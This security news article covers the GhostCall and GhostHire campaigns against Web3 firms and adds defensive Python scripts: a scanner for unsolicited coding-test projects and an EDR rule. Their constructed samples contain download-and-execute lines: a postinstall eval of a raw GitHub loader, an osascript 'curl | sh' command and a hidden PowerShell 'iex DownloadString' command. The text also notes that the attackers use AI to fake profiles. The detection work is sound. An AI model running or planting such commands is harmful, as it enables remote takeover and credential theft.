Attacks via Zoom and GitHub: GhostCall and GhostHire Campaigns Expanding Across the Web3 Landscape
04/11/2025
Cybersecurity researchers have recently uncovered two sophisticated attack campaigns targeting the global Web3 and blockchain ecosystem — named GhostCall and GhostHire.
Both are linked to BlueNoroff, a subgroup of the infamous Lazarus Group, active since at least 2017 under the broader SnatchCrypto operation.
Their primary targets include technology firms, investment funds, and Web3 developers across Japan, Australia, India, France, Singapore, Turkey, Sweden, and Hong Kong.

Two Different Attack Vectors — One Common Goal
- GhostCall targets executives and employees of tech and investment organizations with fake investment-meeting invites sent via Zoom or Microsoft Teams. Victims are redirected to a spoofed meeting page that plays a pre-recorded "live call", then are prompted to "update the SDK". If they approve, a malicious AppleScript (macOS) or PowerShell (Windows) payload is downloaded and executed, giving the attackers full control of the device. No software flaw is exploited here: the victim is talked into running the payload, and a genuine meeting client never asks a participant to run a script to update anything.
- GhostHire lures Web3 developers with fake job offers via Telegram and sends a ZIP file presented as a "coding test". When the victim opens and runs the project, it downloads malicious modules from a fake GitHub repository and executes scripts that let the attackers take over the device remotely.
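The GhostHire lure only works if the developer builds or runs the "coding test" without looking at what it does on install. The following is an added example, not code from the original article or from the campaign's own tooling: a small pre-run triage script that walks an extracted project and reports install-time hooks (npm lifecycle scripts, a custom setuptools install command) and lines that fetch remote content and execute it, including direct pulls from GitHub raw or release URLs. The sample project it builds, including the ORG/REPO placeholder URL, is constructed for the example.

```python
"""
Pre-run triage of an unsolicited "coding test" project (added example).
Looks for the pattern described for GhostHire: a project whose install- or
run-time hooks pull additional code from a remote (GitHub) location and
execute it. All file names, contents and URLs below are constructed.
"""
import json
import os
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`.
NPM_LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Files worth reading line by line.
SOURCE_SUFFIXES = {".js", ".ts", ".mjs", ".py", ".sh", ".ps1", ".scpt"}
SOURCE_NAMES = {"Makefile", "setup.py"}

# Something that pulls content over the network ...
REMOTE_FETCH = re.compile(
    r"(curl|wget|https?\.get\(|fetch\(|urllib\.request|requests\.get|"
    r"Invoke-WebRequest|iwr|DownloadString)",
    re.IGNORECASE,
)
# ... combined on the same line with something that executes it.
EXEC_SINK = re.compile(
    r"\b(eval|exec|Function|subprocess|os\.system|child_process|"
    r"osascript|powershell|Invoke-Expression|iex)\b",
    re.IGNORECASE,
)
# Direct references to raw GitHub content or release assets.
RAW_GITHUB = re.compile(
    r"https?://(raw\.githubusercontent\.com|"
    r"github\.com/[^/\s\"']+/[^/\s\"']+/(raw|releases))/",
    re.IGNORECASE,
)
# A custom install command in setup.py runs arbitrary code on `pip install .`.
SETUP_CMDCLASS = re.compile(r"\bcmdclass\s*=")


def scan_package_json(path: Path) -> list:
    """Report npm lifecycle hooks: they execute without the developer calling them."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return []
    scripts = data.get("scripts") or {}
    return [
        f"{path}: npm lifecycle hook '{hook}' runs automatically: {cmd}"
        for hook, cmd in scripts.items()
        if hook in NPM_LIFECYCLE_HOOKS
    ]


def scan_source(path: Path) -> list:
    """Report fetch-and-execute lines and GitHub raw/release downloads."""
    try:
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
    except OSError:
        return []
    findings = []
    if path.name == "setup.py" and any(SETUP_CMDCLASS.search(ln) for ln in lines):
        findings.append(f"{path}: custom setuptools command class (code runs on pip install)")
    for lineno, line in enumerate(lines, 1):
        if RAW_GITHUB.search(line):
            findings.append(f"{path}:{lineno}: pulls code from a GitHub raw/release URL: {line.strip()}")
        elif REMOTE_FETCH.search(line) and EXEC_SINK.search(line):
            findings.append(f"{path}:{lineno}: fetch-and-execute on one line: {line.strip()}")
    return findings


def triage_project(root: str) -> list:
    """Walk the extracted project; an empty list means nothing obvious was found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name == "package.json":
                findings.extend(scan_package_json(path))
            elif path.suffix in SOURCE_SUFFIXES or name in SOURCE_NAMES:
                findings.extend(scan_source(path))
    return findings


# Constructed sample "coding test": a harmless task plus a postinstall hook that
# pulls a loader from a raw GitHub URL and eval()s it. ORG/REPO is a placeholder.
SAMPLE_PROJECT = {
    "package.json": json.dumps({
        "name": "coding-test",
        "scripts": {"test": "jest", "postinstall": "node scripts/setup.js"},
    }),
    "scripts/setup.js": (
        "const https = require('https');\n"
        "https.get('https://raw.githubusercontent.com/ORG/REPO/main/loader.js', "
        "r => { let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d)); });\n"
    ),
    "src/index.js": "module.exports = (a, b) => a + b;\n",
}


def build_sample_project() -> str:
    """Write SAMPLE_PROJECT into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="coding-test-")
    for rel, content in SAMPLE_PROJECT.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    for finding in triage_project(build_sample_project()):
        print(finding)
```

Run it against the extracted ZIP before `npm install`, `pip install` or `make`; two findings come back for the constructed sample (the postinstall hook and the raw GitHub download in scripts/setup.js), while the actual task file is clean. A pattern scan like this is a first filter, not proof of safety: the safe way to run any unsolicited project is still inside a disposable VM with no wallets or credentials on it.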
Severe Impact on Businesses and Individuals
Once infected, the malware can:
- Access sensitive business data, cryptocurrency wallets, and cloud accounts.
- Steal API keys, browser passwords, and system credentials.
- Cause project leaks, financial losses, and reputational damage.
What makes these attacks particularly dangerous is their ability to:
- Operate cross-platform (Windows, macOS, Linux).
- Combine social engineering with custom-built malware.
- Abuse legitimate services such as Zoom, Teams, GitHub, and Telegram, so the first contact arrives through channels people already trust.
- Leverage AI tools (such as GPT-4o) to generate fake profiles, messages, and videos that appear strikingly real.
DTG CORP’s Expert Recommendations
To minimize risks from such evolving threats, organizations should:
- Verify the source of every invite, file, or link received through Zoom, Teams, GitHub, or Telegram over a second channel before opening it, and treat any in-meeting prompt to "update" or install something as the lure it usually is.
- Restrict what employees and AI agents can reach: give each account and agent access only to the systems and data its role needs, so one compromised workstation does not expose wallets, cloud accounts, and API keys at once.
- Deploy Endpoint Detection and Response (EDR) and watch for script interpreters (osascript, PowerShell, shells) started by meeting clients, browsers, or messengers, or downloading and executing remote content.
- Train staff to recognize social engineering, including fake recruitment and investment approaches, and give developers a disposable VM or container for any unsolicited "coding test".
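The EDR recommendation above is only useful if it is turned into a concrete rule. The following is an added example, not code from the original article, from any EDR product, or from the campaigns' own tooling: a detection over constructed JSON process-creation events (one per line) that flags a script interpreter launched by a meeting client, browser, or messenger, a command line that downloads and executes remote content, or PowerShell started with hidden-window and policy-bypass flags. All hosts, paths, and URLs are constructed; example.invalid is a reserved test domain, and the parent-process paths are illustrative, not verified install locations.

```python
"""
Endpoint detection rule for the execution stage of GhostCall-style lures
(added example). Runs over constructed JSON-lines process telemetry.
"""
import json
import ntpath
import re

# Interpreters whose parent and command line deserve scrutiny.
SCRIPT_HOSTS = {"osascript", "powershell.exe", "pwsh.exe", "pwsh", "bash", "sh", "zsh", "cmd.exe"}

# Programs that handle untrusted content but should never need to start a script interpreter.
UNTRUSTED_PARENT = re.compile(
    r"(zoom\.us|zoom\.exe|teams\.exe|ms-teams\.exe|Microsoft Teams|Telegram|"
    r"Google Chrome|chrome\.exe|Safari|firefox|msedge\.exe|Archive Utility)",
    re.IGNORECASE,
)
# Download primitives ...
FETCH = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient)",
    re.IGNORECASE,
)
# ... feeding an execution primitive.
EXEC = re.compile(
    r"(\|\s*(ba)?sh\b|do shell script|Invoke-Expression|\biex\b|\beval\b)",
    re.IGNORECASE,
)
URL = re.compile(r"https?://\S+", re.IGNORECASE)
# PowerShell flags that only make sense when the operator wants the window and policy out of the way.
STEALTH_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop\b|-noprofile\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)
POWERSHELL = {"powershell.exe", "pwsh.exe", "pwsh"}


def basename(path: str) -> str:
    """Last path component, lower-cased; ntpath accepts both '\\' and '/' separators."""
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list:
    """Return the reasons this event is suspicious; an empty list means benign under this rule."""
    image = basename(event.get("image", ""))
    if image not in SCRIPT_HOSTS:
        return []
    parent = event.get("parent", "")
    cmd = event.get("cmdline", "")
    reasons = []
    if UNTRUSTED_PARENT.search(parent):
        reasons.append(f"{image} started by {basename(parent)}")
    if FETCH.search(cmd) and EXEC.search(cmd) and URL.search(cmd):
        reasons.append("command line downloads remote content and executes it")
    if image in POWERSHELL and STEALTH_FLAGS.search(cmd):
        reasons.append("PowerShell launched with hidden window / policy bypass flags")
    return reasons


def detect(log_lines) -> list:
    """Run the rule over JSON-lines telemetry and return one alert per suspicious event."""
    alerts = []
    for raw in log_lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except ValueError:
            continue  # malformed telemetry line: skip it rather than stop the pipeline
        reasons = evaluate(event)
        if reasons:
            alerts.append({"host": event.get("host"), "pid": event.get("pid"), "reasons": reasons})
    return alerts


# Constructed telemetry: two lure executions and two benign events.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    # "Update SDK" on the fake meeting page ran an AppleScript that shells out to curl | sh.
    {"host": "mac-exec-01", "pid": 4410,
     "parent": "/Applications/zoom.us.app/Contents/MacOS/zoom.us",
     "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'do shell script \"curl -fsSL https://sdk-update.example.invalid/update.sh | sh\"'"},
    # Windows variant: hidden PowerShell fetching and iex-ing a script.
    {"host": "win-exec-02", "pid": 7212,
     "parent": "C:\\Users\\u\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://sdk-update.example.invalid/update.ps1')\""},
    # Benign: a developer runs a build script from a terminal.
    {"host": "mac-dev-03", "pid": 9001,
     "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/zsh", "cmdline": "zsh ./build.sh"},
    # Benign: the meeting client starts its own (non-script) updater.
    {"host": "mac-exec-01", "pid": 4412,
     "parent": "/Applications/zoom.us.app/Contents/MacOS/zoom.us",
     "image": "/Applications/zoom.us.app/Contents/MacOS/ZoomUpdater",
     "cmdline": "ZoomUpdater --check"},
])


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(json.dumps(alert))
```

Only the two lure events produce alerts; the build script from a terminal and the updater launched by the meeting client itself do not, because the rule keys on a script interpreter as the child, not on the meeting client alone. Tune the parent list to the clients actually deployed, and expect to add exclusions for legitimate automation that shells out from a browser or messenger.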
While there are no confirmed cases in Vietnam yet, the widespread use of Telegram, Zoom, Teams, and GitHub means the risk of exposure remains high.
Organizations in Web3, fintech, and technology sectors are advised to strengthen their cybersecurity posture, update defense tools, and remain vigilant — because in today’s connected world, a single careless click could open the door for an entire cyber operation.
(Information referenced from WhiteHat)